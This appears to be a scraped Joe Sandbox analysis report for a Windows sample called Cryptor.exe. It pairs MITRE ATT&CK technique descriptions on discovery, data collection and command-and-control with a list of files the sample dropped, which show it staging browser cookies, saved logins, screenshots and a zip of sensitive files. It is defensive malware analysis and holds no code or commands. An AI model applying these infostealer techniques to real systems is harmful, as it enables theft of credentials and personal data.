Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Cryptor.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Cookies

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Chrome_Default_Network.txt

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\screen1.png

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\sensitive-files.zip

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\user_info.txt

C:\Users\user\AppData\Local\Temp\History

C:\Users\user\AppData\Local\Temp\Login Data

C:\Users\user\AppData\Local\Temp\Web Data

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdrfuzpy.3oc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdm5rzwx.vqg.ps1

C:\Users\user\AppData\Local\Temp\out.zip

C:\Users\user\AppData\Local\Temp\sensitive-files.zip

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Cryptor.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre